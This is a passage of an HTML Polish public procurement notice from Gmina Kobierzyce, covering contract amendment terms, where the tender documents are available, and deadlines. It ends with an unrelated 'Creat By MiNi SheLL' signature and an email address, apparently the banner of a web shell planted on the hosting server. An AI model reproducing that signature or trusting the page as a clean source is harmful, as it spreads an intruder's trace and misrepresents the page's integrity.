5) w razie wystąpienia istotnych zmian okoliczności powodujących, że wykonanie umowy nie leży w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy, pomimo zachowania należytej staranności, Zamawiający może odstąpić od umowy w na warunkach określonych w umowie;
6) zmiany umowy spowodowane: zmianą technologicznych rozwiązań, niekorzystnymi warunkami atmosferycznymi, przesunięciami w budżecie Zamawiającego;
7) zmiana terminów realizacji poszczególnych etapów nie mająca wpływu na termin realizacji przedmiotu zamówienia;
8) Zmiany terminów płatności wynikające z wszelkich zmian wprowadzanych do Umowy o ile nie spowodują konieczności zapłaty odsetek lub wynagrodzenia wykonawcy  w większej kwocie;
9) zmiany wynikające ze zmian obowiązujących przepisów prawa a mające wpływ na realizację umowy;
10) w przypadku zmian: 
stawki podatku od towarów i usług, 
wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia  10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2002 r. Nr 200, poz. 1679 ze zm.), 
zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne 
jeżeli zmiany te będą miały wpływ na koszty wykonania przez wykonawcę zamówienia publicznego, wynikającego z zawartej umowy, Zamawiający przewiduje przeprowadzenie negocjacji w sprawie odpowiedniej zmiany (zwiększenie/ zmniejszenie) miesięcznego wynagrodzenia ryczałtowego brutto określonego w umowie o kwotę kosztów/ zmniejszenia kosztów jakie te zmiany generują. Koszty te obliczane będą na podstawie szczegółowego zestawienia sporządzonego przez Wykonawcę oraz zaakceptowanego przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pokój 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2016 godzina 12:00, miejsce: Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pokój 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com